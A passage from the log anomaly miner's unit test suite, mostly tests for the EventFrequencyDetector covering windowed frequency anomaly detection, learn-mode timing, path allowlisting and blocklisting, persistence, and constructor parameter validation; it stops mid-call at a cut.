self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, EventCountClusterDetector, self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=set()) EventCountClusterDetector(self.aminer_config, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/EventFrequencyDetectorTest.py000066400000000000000000001447371500476301700314720ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.EventFrequencyDetector import EventFrequencyDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class EventFrequencyDetectorTest(TestBase): """Unittests for the EventFrequencyDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new frequencies. The EFD is used with one path to be analyzed over four time windows. The frequencies do not change a lot in the first time windows, thus no anomalies are generated. Then, value frequencies change and anomalies are created in the last time windows. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ # Initialize detector for analyzing values in one path in time windows of 10 seconds t = time.time() expected_string = '%s Frequency anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) # Prepare log atoms that represent different amounts of values a, b over time # Four time windows are used. The first time window is used for initialization. The # second time window represents normal behavior, i.e., the frequencies do not change # too much and no anomalies should be generated. The third window contains changes # of value frequencies and thus anomalies should be generated. The fourth time window # only has the purpose of marking the end of the third time window. # The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 3 times # value b: 1 time # window 3: # value a: 0 times # value b: 2 times # window 4: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+17, None) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+18, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+19, None) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+25, None) log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+25, None) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+35, None) efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [1]}) efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [2]}) efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3]}) efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 1]}) efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 3]}) efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4]}) efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4, 1]}) efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 4, 2]}) efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [4, 2, 1]}) # target_path_list efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) # Forward log atoms to detector # Log atoms of initial window 1 should not create anomalies and add to counts # Input: a; initial time window is started # Expected output: frequency of a is 1 efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [1]}) # Input: b; initial time window is not finished # Expected output: frequency of b is 1 added to existing count efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [1], ("b",): [1]}) # Input: a; initial time window is not finished # Expected output: frequency of a is 2 replaces a in existing count efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2], ("b",): [1]}) # Time window 2 should not create anomalies since a is in confidence (3 vs 2 occurrences) and b is identical (1 occurrence). # Input: a; initial time window is completed, second time window is started # Expected output: frequency of a is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 1], ("b",): [1, 0]}) # Input: b; second time window is not finished # Expected output: frequency of b is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 1], ("b",): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 3 in new time window count, old count remains unchanged efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 2], ("b",): [1, 1]}) # Input: a; second time window is not finished # Expected output: frequency of a is 4 in new time window count, old count remains unchanged efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3], ("b",): [1, 1]}) # Time window 3 should create 2 anomalies since a drops from 3 to 0 and b increases from 1 to 2, which will be reported in window 4. # Anomalies are only reported when third time window is known to be completed, which will occur when subsequent atom is received. # Input: b; second time window is completed, third time window is started # Expected output: frequency of b is 1 in new time window count, old count remains unchanged efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3, 0], ("b",): [1, 1, 1]}) # Input: b; third time window is not finished # Expected output: frequency of b is 2 in new time window count, old count remains unchanged efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("a",): [2, 3, 0], ("b",): [1, 1, 2]}) # Time window 4 should not create anomalies since no log atom is received to evaluate it. # Input: a; third time window is completed, fourth time window is started # Expected output: Anomalies for unexpected low counts of a (0 instead of 3) and b (2 instead of 1), frequency of a is 1 in new # time window count, old count remains unchanged efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+35).strftime(dtf), efd.__class__.__name__, 1, "a") + expected_string % (datetime.fromtimestamp(t+25).strftime(dtf), efd.__class__.__name__, 1, "b")) self.assertEqual(efd.counts, {("a",): [3, 0, 1], ("b",): [1, 2, 0]}) self.reset_output_stream() # unique_path_list efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], unique_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False) efd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [1]}) efd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [2]}) efd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3]}) efd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 1]}) efd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom7) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2]}) efd.receive_atom(log_atom8) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2, 1]}) efd.receive_atom(log_atom9) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [3, 2, 1]}) efd.receive_atom(log_atom10) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(efd.counts, {("/value",): [2, 1, 1]}) # stop_learning_time efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(efd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(efd.receive_atom(log_atom1)) self.assertTrue(efd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(efd.receive_atom(log_atom1)) self.assertFalse(efd.learn_mode) # stop_learning_no_anomaly_time efd = EventFrequencyDetector(aminer_config=self.aminer_config, anomaly_event_handlers=[self.stream_printer_event_handler], target_path_list=["/value"], window_size=10, num_windows=1, confidence_factor=0.51, empty_window_warnings=True, learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(efd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(efd.receive_atom(log_atom1)) self.assertTrue(efd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(efd.receive_atom(log_atom2)) self.assertTrue(efd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(efd.receive_atom(log_atom1)) self.assertFalse(efd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler]) t = time.time() efd.next_persist_time = t + 400 self.assertEqual(efd.do_timer(t + 200), 200) self.assertEqual(efd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(efd.do_timer(t + 999), 1) self.assertEqual(efd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, efd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventFrequencyDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, efd.allowlist_event, analysis % efd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(efd.allowlist_event(analysis % efd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % efd.__class__.__name__)) self.assertEqual(efd.constraint_list, ["/s1"]) efd.learn_mode = False self.assertEqual(efd.allowlist_event(analysis % efd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % efd.__class__.__name__)) self.assertEqual(efd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler]) analysis = "Analysis.%s" self.assertRaises(Exception, efd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The EventFrequencyDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, efd.blocklist_event, analysis % efd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(efd.blocklist_event(analysis % efd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % efd.__class__.__name__)) self.assertEqual(efd.ignore_list, ["/s1"]) efd.learn_mode = False self.assertEqual(efd.blocklist_event(analysis % efd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % efd.__class__.__name__)) self.assertEqual(efd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() efd = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=True, learn_mode=True) log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 17, None) log_atom6 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 18, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 19, None) # Start of window 3: log_atom8 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None) log_atom9 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t + 25, None) # Start of window 4: log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t + 35, None) efd.receive_atom(log_atom1) efd.receive_atom(log_atom2) efd.receive_atom(log_atom3) efd.receive_atom(log_atom4) efd.receive_atom(log_atom5) efd.receive_atom(log_atom6) efd.receive_atom(log_atom7) efd.receive_atom(log_atom8) efd.receive_atom(log_atom9) efd.receive_atom(log_atom10) efd.do_persist() with open(efd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[["string:/value"], [], []]]') self.assertEqual(efd.counts, {("/value",): [10]}) self.assertEqual(efd.scoring_value_list, {}) efd.counts = {} efd.load_persistence_data() self.assertEqual(efd.counts, {("/value",): [0]}) other = EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=True, learn_mode=True) self.assertEqual(other.counts, efd.counts) self.assertEqual(other.scoring_value_list, efd.scoring_value_list) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, "") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, ()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, set()) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], target_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], scoring_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=[""]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=123.3) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], unique_path_list=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], unique_path_list=[]) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], unique_path_list=None) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], window_size=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=100) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], window_size=0.5) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=0) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=100.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], num_windows=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], num_windows=100) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1.1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], confidence_factor=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=0.5) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], confidence_factor=1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], empty_window_warnings=True) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=b"True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output="True") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=123) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=123.22) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], early_exceeding_anomaly_output=True) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=-1) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=0) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=10.12) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=-1) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=0) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_lower_limit=11, set_upper_limit=10) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit="123") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit={"id": "Default"}) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=["Default"]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=[]) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=()) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=set()) EventFrequencyDetector(self.aminer_config, [self.stream_printer_event_handler], set_upper_limit=10.12) self.assertRaises(ValueError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, EventFrequencyDetector, self.aminer_config, [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, EventFrequencyDetector, 